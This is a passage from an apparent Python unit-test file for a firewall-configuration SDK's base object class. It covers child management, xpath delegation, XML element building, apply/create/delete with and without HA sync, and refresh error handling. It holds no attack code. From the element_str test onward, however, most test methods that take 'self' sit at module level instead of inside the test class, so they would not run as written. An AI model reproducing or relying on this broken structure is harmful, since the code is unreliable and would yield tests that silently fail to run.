        CHILD_NAME = "child"
        child = Base.PanObject(CHILD_NAME)

        ret_value = self.obj.add(child)

        # add() returns the child and links both sides of the tree.
        self.assertEqual(child, ret_value)
        self.verify_object(self.obj, name=OBJECT_NAME, children=[child,])
        self.verify_object(child, name=CHILD_NAME, parent=self.obj)

    def test_add_with_children(self):
        CHILD1_NAME = "FirstChild"
        child1 = Base.PanObject(CHILD1_NAME)
        child1.parent = self.obj
        self.obj.children = [
            child1,
        ]
        CHILD2_NAME = "SecondChild"
        child2 = Base.PanObject(CHILD2_NAME)

        ret_val = self.obj.add(child2)

        self.assertEqual(child2, ret_val)
        self.verify_object(self.obj, name=OBJECT_NAME, children=[child1, child2])
        self.verify_object(child1, name=CHILD1_NAME, parent=self.obj)
        self.verify_object(child2, name=CHILD2_NAME, parent=self.obj)

    def test_insert_without_children(self):
        CHILD_NAME = "Child"
        child = Base.PanObject(CHILD_NAME)

        ret_val = self.obj.insert(0, child)

        self.assertEqual(child, ret_val)
        self.verify_object(self.obj, name=OBJECT_NAME, children=[child,])
        self.verify_object(child, name=CHILD_NAME, parent=self.obj)

    def test_insert_with_children(self):
        # Inserting at index 1 places the child between two existing ones.
        CHILD1_NAME = "FirstChild"
        child1 = Base.PanObject(CHILD1_NAME)
        child1.parent = self.obj
        CHILD3_NAME = "ThirdChild"
        child3 = Base.PanObject(CHILD3_NAME)
        child3.parent = self.obj
        self.obj.children = [child1, child3]
        CHILD2_NAME = "SecondChild"
        child2 = Base.PanObject(CHILD2_NAME)

        ret_val = self.obj.insert(1, child2)

        self.assertEqual(child2, ret_val)
        self.verify_object(
            self.obj, name=OBJECT_NAME, children=[child1, child2, child3]
        )
        self.verify_object(child1, name=CHILD1_NAME, parent=self.obj)
        self.verify_object(child2, name=CHILD2_NAME, parent=self.obj)
        self.verify_object(child3, name=CHILD3_NAME, parent=self.obj)

    def test_extend_without_children(self):
        CHILD1_NAME = "FirstChild"
        child1 = Base.PanObject(CHILD1_NAME)
        CHILD2_NAME = "SecondChild"
        child2 = Base.PanObject(CHILD2_NAME)
        children = [child1, child2]

        ret_val = self.obj.extend(children)

        # extend() returns None, unlike add()/insert().
        self.assertIsNone(ret_val)
        self.verify_object(self.obj, name=OBJECT_NAME, children=children)
        self.verify_object(child1, name=CHILD1_NAME, parent=self.obj)
        self.verify_object(child2, name=CHILD2_NAME, parent=self.obj)

    def test_extend_with_children(self):
        CHILD1_NAME = "FirstChild"
        child1 = Base.PanObject(CHILD1_NAME)
        child1.parent = self.obj
        self.obj.children = [
            child1,
        ]
        CHILD2_NAME = "SecondChild"
        child2 = Base.PanObject(CHILD2_NAME)
        CHILD3_NAME = "ThirdChild"
        child3 = Base.PanObject(CHILD3_NAME)
        new_children = [child2, child3]
        all_children = [child1, child2, child3]

        ret_val = self.obj.extend(new_children)

        self.assertIsNone(ret_val)
        self.verify_object(self.obj, name=OBJECT_NAME, children=all_children)
        self.verify_object(child1, name=CHILD1_NAME, parent=self.obj)
        self.verify_object(child2, name=CHILD2_NAME, parent=self.obj)
        self.verify_object(child3, name=CHILD3_NAME, parent=self.obj)
    # --- child management: pop / remove / remove_by_name ---

    def test_pop(self):
        CHILD_NAME = "Child"
        child = Base.PanObject(CHILD_NAME)
        child.parent = self.obj
        self.obj.children = [
            child,
        ]

        ret_val = self.obj.pop(0)

        # pop() detaches the child: the parent link is cleared on both sides.
        self.assertEqual(child, ret_val)
        self.verify_object(self.obj, name=OBJECT_NAME)
        self.verify_object(child, name=CHILD_NAME)

    def test_pop_raises_error(self):
        """An invalid index should raise IndexError."""
        self.assertRaises(IndexError, self.obj.pop, 0)

    def test_remove(self):
        CHILD1_NAME = "Child1"
        child1 = Base.PanObject(CHILD1_NAME)
        child1.parent = self.obj
        CHILD2_NAME = "Child2"
        child2 = Base.PanObject(CHILD2_NAME)
        child2.parent = self.obj
        self.obj.children = [child1, child2]

        ret_val = self.obj.remove(child2)

        self.assertIsNone(ret_val)
        self.verify_object(self.obj, name=OBJECT_NAME, children=[child1,])
        self.verify_object(child1, name=CHILD1_NAME, parent=self.obj)
        self.verify_object(child2, name=CHILD2_NAME)

    def test_remove_raises_error(self):
        """An invalid child should raise ValueError."""
        CHILD1_NAME = "Child1"
        child1 = Base.PanObject(CHILD1_NAME)
        child1.parent = self.obj
        CHILD2_NAME = "Child2"
        child2 = Base.PanObject(CHILD2_NAME)
        self.obj.children = [
            child1,
        ]

        self.assertRaises(ValueError, self.obj.remove, child2)

    def test_remove_by_name_when_find_returns_index(self):
        # When find_index locates the child, remove_by_name pops that index.
        CHILD_NAME = "MyChild"
        self.obj.children = [1, 2, 3]
        INDEX_VALUE = 4
        self.obj.find_index = mock.Mock(return_value=INDEX_VALUE)
        POP_RETURN_VALUE = "foo"
        self.obj.pop = mock.Mock(return_value=POP_RETURN_VALUE)

        ret_val = self.obj.remove_by_name(CHILD_NAME, None)

        self.assertEqual(POP_RETURN_VALUE, ret_val)
        self.obj.find_index.assert_called_once_with(CHILD_NAME, None)
        self.obj.pop.assert_called_once_with(INDEX_VALUE)

    def test_remove_by_name_when_find_returns_none(self):
        # Missing child: remove_by_name returns None without popping.
        CHILD_NAME = "foo"
        self.obj.children = ["a", "b", "c"]
        self.obj.find_index = mock.Mock(return_value=None)

        ret_val = self.obj.remove_by_name(CHILD_NAME, None)

        self.assertIsNone(ret_val)
        self.obj.find_index.assert_called_once_with(CHILD_NAME, None)
    # Skipping removeall
    # Skipping xpath_nosuffix
    # Skipping xpath_short

    # --- xpath delegation to the parent object ---

    def test_xpath_vsys_without_parent(self):
        ret_val = self.obj.xpath_vsys()

        self.assertIsNone(ret_val)

    def test_xpath_vsys_with_parent(self):
        # With a parent attached, the call is delegated to it.
        expected_value = "foo"
        spec = {
            "xpath_vsys.return_value": expected_value,
        }
        self.obj.parent = mock.Mock(**spec)

        ret_val = self.obj.xpath_vsys()

        self.assertEqual(expected_value, ret_val)
        self.obj.parent.xpath_vsys.assert_called_once_with()

    def test_xpath_panorama_without_parent(self):
        ret_val = self.obj.xpath_panorama()

        self.assertIsNone(ret_val)

    def test_xpath_panorama_with_parent(self):
        expected_value = "foo"
        spec = {
            "xpath_panorama.return_value": expected_value,
        }
        self.obj.parent = mock.Mock(**spec)

        ret_val = self.obj.xpath_panorama()

        self.assertEqual(expected_value, ret_val)
        self.obj.parent.xpath_panorama.assert_called_once_with()
# Skip element()
@mock.patch("panos.base.ET")
def test_element_str(self, m_ET):
    """element_str() serializes element() via ET.tostring as UTF-8."""
    Element_Value = 42
    self.obj.element = mock.Mock(return_value=Element_Value)
    Tostring_Value = "42"
    spec = {
        "tostring.return_value": Tostring_Value,
    }
    m_ET.configure_mock(**spec)
    ret_val = self.obj.element_str()
    self.assertEqual(Tostring_Value, ret_val)
    self.obj.element.assert_called_once_with()
    m_ET.tostring.assert_called_once_with(Element_Value, encoding="utf-8")
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
@mock.patch("panos.base.ET")
def test_root_element_with_entry_suffix(self, m_ET, m_uid):
    """ENTRY suffix produces <entry name="{uid}">."""
    self.obj.SUFFIX = Base.ENTRY
    Uid = "uid"
    expected = "Value"
    spec = {
        "Element.return_value": expected,
    }
    m_ET.configure_mock(**spec)
    m_uid.return_value = Uid
    ret_val = self.obj._root_element()
    self.assertEqual(expected, ret_val)
    m_ET.Element.assert_called_once_with("entry", {"name": Uid})

@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
@mock.patch("panos.base.ET")
def test_root_element_with_member_suffix(self, m_ET, m_uid):
    """MEMBER suffix produces <member> whose text is the uid."""
    self.obj.SUFFIX = Base.MEMBER
    Uid = "uid"
    expected = mock.Mock(text=Uid)
    spec = {
        "Element.return_value": mock.Mock(),
    }
    m_ET.configure_mock(**spec)
    m_uid.return_value = Uid
    ret_val = self.obj._root_element()
    self.assertEqual(Uid, ret_val.text)
    m_ET.Element.assert_called_once_with("member")
@mock.patch("panos.base.ET")
def test_root_element_with_none_suffix_no_slashes(self, m_ET):
    """With no suffix, the XPATH itself (single component) is the tag."""
    self.obj.SUFFIX = None
    expected_tag = "baz"
    full_path = expected_tag
    self.obj.XPATH = full_path
    expected_value = "42"
    spec = {
        "Element.return_value": expected_value,
    }
    m_ET.configure_mock(**spec)
    ret_val = self.obj._root_element()
    self.assertEqual(expected_value, ret_val)
    m_ET.Element.assert_called_once_with(expected_tag)

@mock.patch("panos.base.ET")
def test_root_element_with_none_suffix_multiple_slashes(self, m_ET):
    """With no suffix, only the last XPATH component becomes the tag."""
    self.obj.SUFFIX = None
    expected_tag = "baz"
    full_path = "/foo/bar/baz"
    self.obj.XPATH = full_path
    expected_value = "42"
    spec = {
        "Element.return_value": expected_value,
    }
    m_ET.configure_mock(**spec)
    ret_val = self.obj._root_element()
    self.assertEqual(expected_value, ret_val)
    m_ET.Element.assert_called_once_with(expected_tag)
# Skip _subelements
def test_check_child_methods_for_name_not_in_childmethods(self):
    """Unknown method names are only propagated to the children."""
    spec = {
        "_check_child_methods.return_value": None,
    }
    for x in range(3):
        m = mock.Mock(**spec)
        self.obj.children.append(m)
    # Random name guarantees it is not in CHILDMETHODS.
    Method = str(uuid.uuid4()).replace("-", "_")
    ret_val = self.obj._check_child_methods(Method)
    self.assertIsNone(ret_val)
    for c in self.obj.children:
        c._check_child_methods.assert_called_once_with(Method)

def test_check_child_methods_for_name_in_childmethods(self):
    """Registered method names invoke child_<name>() AND propagate."""
    spec = {
        "_check_child_methods.return_value": None,
    }
    for x in range(3):
        m = mock.Mock(**spec)
        self.obj.children.append(m)
    Method = str(uuid.uuid4()).replace("-", "_")
    self.obj.CHILDMETHODS += (Method,)
    setattr(self.obj, "child_{0}".format(Method), mock.Mock())
    ret_val = self.obj._check_child_methods(Method)
    self.assertIsNone(ret_val)
    m = getattr(self.obj, "child_{0}".format(Method))
    m.assert_called_once_with()
    for c in self.obj.children:
        c._check_child_methods.assert_called_once_with(Method)
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test_apply_with_ha_sync(self, m_uid):
    """apply() with HA sync routes the edit through active().xapi."""
    PanDeviceId = "42"
    PanDeviceXpath = "path"
    PanDeviceElementStr = "element string"
    spec = {
        "id": PanDeviceId,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=PanDeviceXpath)
    self.obj.element_str = mock.Mock(return_value=PanDeviceElementStr)
    m_uid.return_value = "uid"
    for x in range(3):
        child = mock.Mock(**spec)
        self.obj.children.append(child)
    ret_val = self.obj.apply()
    self.assertIsNone(ret_val)
    m_panos.set_config_changed.assert_called_once_with()
    m_panos.active().xapi.edit.assert_called_once_with(
        PanDeviceXpath, PanDeviceElementStr, retry_on_peer=self.obj.HA_SYNC,
    )
    self.obj.xpath.assert_called_once_with()
    self.obj.element_str.assert_called_once_with()
    # apply must fan out to every child as well.
    for c in self.obj.children:
        c._check_child_methods.assert_called_once_with("apply")

@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test_apply_without_ha_sync(self, m_uid):
    """apply() without HA sync uses the device's xapi directly."""
    PanDeviceId = "42"
    PanDeviceXpath = "path"
    PanDeviceElementStr = "element string"
    self.obj.HA_SYNC = False
    spec = {
        "id": PanDeviceId,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=PanDeviceXpath)
    self.obj.element_str = mock.Mock(return_value=PanDeviceElementStr)
    m_uid.return_value = "uid"
    for x in range(3):
        child = mock.Mock(**spec)
        self.obj.children.append(child)
    ret_val = self.obj.apply()
    self.assertIsNone(ret_val)
    m_panos.set_config_changed.assert_called_once_with()
    m_panos.xapi.edit.assert_called_once_with(
        PanDeviceXpath, PanDeviceElementStr, retry_on_peer=self.obj.HA_SYNC,
    )
    self.obj.xpath.assert_called_once_with()
    self.obj.element_str.assert_called_once_with()
    for c in self.obj.children:
        c._check_child_methods.assert_called_once_with("apply")
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test_create_with_ha_sync(self, m_uid):
    """create() with HA sync issues xapi.set via active() on the short xpath."""
    PanDeviceId = "42"
    PanDeviceXpath = "path"
    PanDeviceElementStr = "element string"
    spec = {
        "id": PanDeviceId,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath_short = mock.Mock(return_value=PanDeviceXpath)
    self.obj.element_str = mock.Mock(return_value=PanDeviceElementStr)
    m_uid.return_value = "uid"
    for x in range(3):
        child = mock.Mock(**spec)
        self.obj.children.append(child)
    ret_val = self.obj.create()
    self.assertIsNone(ret_val)
    m_panos.set_config_changed.assert_called_once_with()
    m_panos.active().xapi.set.assert_called_once_with(
        PanDeviceXpath, PanDeviceElementStr, retry_on_peer=self.obj.HA_SYNC,
    )
    # create uses the short xpath (no suffix), unlike apply.
    self.obj.xpath_short.assert_called_once_with()
    self.obj.element_str.assert_called_once_with()
    for c in self.obj.children:
        c._check_child_methods.assert_called_once_with("create")

@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test_create_without_ha_sync(self, m_uid):
    """create() without HA sync issues xapi.set directly."""
    PanDeviceId = "42"
    PanDeviceXpath = "path"
    PanDeviceElementStr = "element string"
    self.obj.HA_SYNC = False
    spec = {
        "id": PanDeviceId,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath_short = mock.Mock(return_value=PanDeviceXpath)
    self.obj.element_str = mock.Mock(return_value=PanDeviceElementStr)
    m_uid.return_value = "uid"
    for x in range(3):
        child = mock.Mock()
        self.obj.children.append(child)
    ret_val = self.obj.create()
    self.assertIsNone(ret_val)
    m_panos.set_config_changed.assert_called_once_with()
    m_panos.xapi.set.assert_called_once_with(
        PanDeviceXpath, PanDeviceElementStr, retry_on_peer=self.obj.HA_SYNC,
    )
    self.obj.xpath_short.assert_called_once_with()
    self.obj.element_str.assert_called_once_with()
    for c in self.obj.children:
        c._check_child_methods.assert_called_once_with("create")
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test_delete_with_ha_sync_no_parent(self, m_uid):
    """delete() with HA sync issues xapi.delete via active()."""
    PanDeviceId = "42"
    PanDeviceXpath = "path"
    spec = {
        "id": PanDeviceId,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=PanDeviceXpath)
    m_uid.return_value = "uid"
    for x in range(3):
        child = mock.Mock(**spec)
        self.obj.children.append(child)
    ret_val = self.obj.delete()
    self.assertIsNone(ret_val)
    m_panos.set_config_changed.assert_called_once_with()
    m_panos.active().xapi.delete.assert_called_once_with(
        PanDeviceXpath, retry_on_peer=self.obj.HA_SYNC,
    )
    self.obj.xpath.assert_called_once_with()
    for c in self.obj.children:
        c._check_child_methods.assert_called_once_with("delete")

@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test_delete_with_ha_sync_and_parent(self, m_uid):
    """delete() also removes the object from its parent, if any."""
    PanDeviceId = "42"
    PanDeviceXpath = "path"
    Uid = "uid"
    spec = {
        "id": PanDeviceId,
    }
    m_panos = mock.Mock(**spec)
    self.obj.parent = mock.Mock()
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=PanDeviceXpath)
    m_uid.return_value = Uid
    for x in range(3):
        child = mock.Mock(**spec)
        self.obj.children.append(child)
    ret_val = self.obj.delete()
    self.assertIsNone(ret_val)
    # The parent's child list must be updated locally as well.
    self.obj.parent.remove.assert_called_once_with(self.obj)
    m_panos.set_config_changed.assert_called_once_with()
    m_panos.active().xapi.delete.assert_called_once_with(
        PanDeviceXpath, retry_on_peer=self.obj.HA_SYNC,
    )
    self.obj.xpath.assert_called_once_with()
    for c in self.obj.children:
        c._check_child_methods.assert_called_once_with("delete")
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test_delete_without_ha_sync(self, m_uid):
    """delete() with HA_SYNC off goes straight to xapi (no active()).

    Bug fix: the original test body was truncated -- it created child
    mocks without attaching them, never called delete(), and asserted
    nothing.  Completed here to mirror test_apply_without_ha_sync and
    test_create_without_ha_sync.
    """
    PanDeviceId = "42"
    PanDeviceXpath = "path"
    m_uid.return_value = "uid"
    self.obj.HA_SYNC = False
    spec = {
        "id": PanDeviceId,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=PanDeviceXpath)
    for x in range(3):
        child = mock.Mock()
        self.obj.children.append(child)
    ret_val = self.obj.delete()
    self.assertIsNone(ret_val)
    m_panos.set_config_changed.assert_called_once_with()
    # Without HA sync the call skips active() and hits xapi directly.
    m_panos.xapi.delete.assert_called_once_with(
        PanDeviceXpath, retry_on_peer=self.obj.HA_SYNC,
    )
    self.obj.xpath.assert_called_once_with()
    for c in self.obj.children:
        c._check_child_methods.assert_called_once_with("delete")
# Skip update
# Skip refresh
# Skip refresh_variable
# Skip _refresh_children
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_default_args_none_suffix(self, m_uid):
    """_refresh_xml() with no suffix looks up "result/" in the response."""
    Xpath = "/x/path"
    lasttag = ""
    expected = "foo"
    spec = {
        "find.return_value": expected,
    }
    m_root = mock.Mock(**spec)
    m_uid.return_value = "uid"
    spec = {
        "id": "myid",
        "xapi.get.return_value": m_root,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=Xpath)
    # Args: running_config=False, refresh_children=True.
    ret_val = self.obj._refresh_xml(False, True)
    self.assertEqual(expected, ret_val)
    m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
    self.obj.xpath.assert_called_once_with()
    m_root.find.assert_called_once_with("result/{0}".format(lasttag))

@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_default_args_with_member_suffix(self, m_uid):
    """MEMBER suffix makes _refresh_xml() look for "result/member"."""
    Xpath = "/x/path"
    lasttag = "member"
    expected = "foo"
    spec = {
        "find.return_value": expected,
    }
    m_root = mock.Mock(**spec)
    m_uid.return_value = "uid"
    spec = {
        "id": "myid",
        "xapi.get.return_value": m_root,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=Xpath)
    self.obj.SUFFIX = Base.MEMBER
    ret_val = self.obj._refresh_xml(False, True)
    self.assertEqual(expected, ret_val)
    m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
    self.obj.xpath.assert_called_once_with()
    m_root.find.assert_called_once_with("result/{0}".format(lasttag))
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_default_args_with_entry_suffix(self, m_uid):
    """ENTRY suffix makes _refresh_xml() look for "result/entry"."""
    Xpath = "/x/path"
    lasttag = "entry"
    expected = "foo"
    spec = {
        "find.return_value": expected,
    }
    m_root = mock.Mock(**spec)
    m_uid.return_value = "uid"
    spec = {
        "id": "myid",
        "xapi.get.return_value": m_root,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=Xpath)
    self.obj.SUFFIX = Base.ENTRY
    ret_val = self.obj._refresh_xml(False, True)
    self.assertEqual(expected, ret_val)
    m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
    self.obj.xpath.assert_called_once_with()
    m_root.find.assert_called_once_with("result/{0}".format(lasttag))

@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_with_running_config(self, m_uid):
    """running_config=True uses xapi.show instead of xapi.get."""
    Xpath = "/x/path"
    lasttag = ""
    expected = "foo"
    spec = {
        "find.return_value": expected,
    }
    m_root = mock.Mock(**spec)
    m_uid.return_value = "uid"
    spec = {
        "id": "myid",
        "xapi.show.return_value": m_root,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=Xpath)
    self.obj.refresh = mock.Mock()
    ret_val = self.obj._refresh_xml(True, True)
    self.assertEqual(expected, ret_val)
    m_panos.xapi.show.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
    self.obj.xpath.assert_called_once_with()
    m_root.find.assert_called_once_with("result/{0}".format(lasttag))
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_no_refresh_children(self, m_uid):
    """refresh_children=False still returns the found element."""
    Xpath = "/x/path"
    lasttag = ""
    expected = "foo"
    spec = {
        "find.return_value": expected,
    }
    m_root = mock.Mock(**spec)
    m_uid.return_value = "uid"
    spec = {
        "id": "myid",
        "xapi.get.return_value": m_root,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=Xpath)
    self.obj.refresh = mock.Mock()
    ret_val = self.obj._refresh_xml(False, False)
    self.assertEqual(expected, ret_val)
    m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
    self.obj.xpath.assert_called_once_with()
    m_root.find.assert_called_once_with("result/{0}".format(lasttag))
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_api_action_raises_pannosuchnode_with_exceptions_on_raises_error(
    self, m_uid
):
    """PanNoSuchNode is translated to PanObjectMissing when exceptions are on."""
    Xpath = "/x/path"
    spec = {
        "id": "myid",
        "xapi.get.side_effect": Err.PanNoSuchNode,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=Xpath)
    m_uid.return_value = "uid"
    self.assertRaises(Err.PanObjectMissing, self.obj._refresh_xml, False, True)
    m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
    self.obj.xpath.assert_called_once_with()

@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_api_action_raises_pannosuchnode_with_exceptions_off_returns_none(
    self, m_uid
):
    """PanNoSuchNode is swallowed (returns None) when exceptions are off."""
    Xpath = "/x/path"
    spec = {
        "id": "myid",
        "xapi.get.side_effect": Err.PanNoSuchNode,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=Xpath)
    m_uid.return_value = "uid"
    ret_val = self.obj._refresh_xml(False, False)
    self.assertIsNone(ret_val)
    m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
    self.obj.xpath.assert_called_once_with()
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_api_action_raises_panxapierror_with_exceptions_on_raises_error(
    self, m_uid
):
    """PanXapiError is translated to PanObjectMissing when exceptions are on."""
    Xpath = "/x/path"
    spec = {
        "id": "myid",
        "xapi.get.side_effect": pan.xapi.PanXapiError,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=Xpath)
    m_uid.return_value = "uid"
    self.assertRaises(Err.PanObjectMissing, self.obj._refresh_xml, False, True)
    m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
    self.obj.xpath.assert_called_once_with()

@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_api_action_raises_panxapierror_with_exceptions_off_returns_none(
    self, m_uid
):
    """PanXapiError is swallowed (returns None) when exceptions are off."""
    Xpath = "/x/path"
    spec = {
        "id": "myid",
        "xapi.get.side_effect": pan.xapi.PanXapiError,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=Xpath)
    m_uid.return_value = "uid"
    ret_val = self.obj._refresh_xml(False, False)
    self.assertIsNone(ret_val)
    m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
    self.obj.xpath.assert_called_once_with()
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_find_fails_with_exceptions_on_raises_error(self, m_uid):
    """A missing result element raises PanObjectMissing when exceptions are on.

    Cleanup: dropped the unused ``expected = "foo"`` local -- find()
    deliberately returns None here, so nothing is ever compared to it.
    """
    Xpath = "/x/path"
    lasttag = ""
    spec = {
        "find.return_value": None,
    }
    m_root = mock.Mock(**spec)
    m_uid.return_value = "uid"
    spec = {
        "id": "myid",
        "xapi.get.return_value": m_root,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=Xpath)
    self.assertRaises(Err.PanObjectMissing, self.obj._refresh_xml, False, True)
    m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
    self.obj.xpath.assert_called_once_with()
    m_root.find.assert_called_once_with("result/{0}".format(lasttag))

@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_find_fails_with_exceptions_off_returns_none(self, m_uid):
    """Requires exceptions=False."""
    # Cleanup: unused ``expected`` local removed here as well.
    Xpath = "/x/path"
    lasttag = ""
    spec = {
        "find.return_value": None,
    }
    m_root = mock.Mock(**spec)
    m_uid.return_value = "uid"
    spec = {
        "id": "myid",
        "xapi.get.return_value": m_root,
    }
    m_panos = mock.Mock(**spec)
    self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
    self.obj.xpath = mock.Mock(return_value=Xpath)
    ret_val = self.obj._refresh_xml(False, False)
    self.assertIsNone(ret_val)
    m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
    self.obj.xpath.assert_called_once_with()
    m_root.find.assert_called_once_with("result/{0}".format(lasttag))
def test_nearest_pandevice(self):
    """nearest_pandevice() delegates to the private _nearest_pandevice()."""
    expected = "return value"
    self.obj._nearest_pandevice = mock.Mock(return_value=expected)
    ret_val = self.obj.nearest_pandevice()
    self.assertEqual(expected, ret_val)
    self.obj._nearest_pandevice.assert_called_once_with()

def test__nearest_pandevice_with_parent(self):
    """_nearest_pandevice() walks up through the parent."""
    expected = "ParentObject"
    spec = {
        "_nearest_pandevice.return_value": expected,
    }
    self.obj.parent = mock.Mock(**spec)
    ret_val = self.obj._nearest_pandevice()
    self.assertEqual(expected, ret_val)
    self.obj.parent._nearest_pandevice.assert_called_once_with()

def test__nearest_pandevice_without_parent_raises_error(self):
    """With no parent chain there is no device: PanDeviceNotSet."""
    self.assertRaises(Err.PanDeviceNotSet, self.obj._nearest_pandevice)
def test_panorama_with_parent(self):
    """panorama() delegates up the parent chain."""
    expected = "PanoramaObject"
    spec = {
        "panorama.return_value": expected,
    }
    self.obj.parent = mock.Mock(**spec)
    ret_val = self.obj.panorama()
    self.assertEqual(expected, ret_val)
    self.obj.parent.panorama.assert_called_once_with()

def test_panorama_without_parent_raises_error(self):
    """panorama() with no parent raises PanDeviceNotSet."""
    self.assertRaises(Err.PanDeviceNotSet, self.obj.panorama)

def test_devicegroup_with_parent(self):
    """devicegroup() delegates up the parent chain."""
    expected = "DeviceGroup"
    spec = {
        "devicegroup.return_value": expected,
    }
    self.obj.parent = mock.Mock(**spec)
    ret_val = self.obj.devicegroup()
    self.assertEqual(expected, ret_val)
    self.obj.parent.devicegroup.assert_called_once_with()

def test_devicegroup_without_parent(self):
    """devicegroup() with no parent returns None (unlike panorama())."""
    ret_val = self.obj.devicegroup()
    self.assertIsNone(ret_val)
# Skip find
# Skip findall
# Skip find_or_create
# Skip findall_or_create
# Skip find_index
# Skip applyall
# Skip refreshall
# Skip refreshall_from_xml
# Skip _parse_xml
class TestParamPath(unittest.TestCase):
    """Tests for ParamPath.element() XML generation."""

    def setUp(self):
        # Fresh root element for each test.
        self.elm = ET.Element("myroot")

    def test_element_for_exclude_returns_none(self):
        """exclude=True means the param is never rendered."""
        settings = {"baz": "jack"}
        p = Base.ParamPath(
            "baz",
            path="foo/bar",
            vartype=None,
            condition=None,
            values=None,
            exclude=True,
        )
        result = p.element(self.elm, settings, False)
        self.assertIsNone(result)

    def test_element_path_has_variable(self):
        """{var} placeholders in the path are filled from settings."""
        p = Base.ParamPath(
            "baz", path="{mode}/bar/baz", vartype=None, condition=None, values=None
        )
        settings = {"baz": "jack", "mode": "layer3"}
        result = p.element(self.elm, settings, False)
        self.assertIsNotNone(result)
        elm = result.find("./layer3/bar/baz")
        self.assertIsNotNone(elm, msg="Failed: elm = {0}".format(ET.tostring(result)))
        self.assertEqual(settings["baz"], elm.text)

    def test_element_for_vartype_member_for_string(self):
        """A scalar value with vartype=member yields a single <member>."""
        p = Base.ParamPath(
            "baz", path="foo/bar/baz", vartype="member", condition=None, values=None
        )
        settings = {"baz": "jack"}
        result = p.element(self.elm, settings, False)
        self.assertIsNotNone(result)
        elm = result.findall("./foo/bar/baz/member")
        self.assertTrue(elm)
        self.assertEqual(1, len(elm))
        self.assertEqual(settings["baz"], elm[0].text)

    def test_element_for_vartype_member_for_list(self):
        """A list value with vartype=member yields one <member> per item."""
        p = Base.ParamPath(
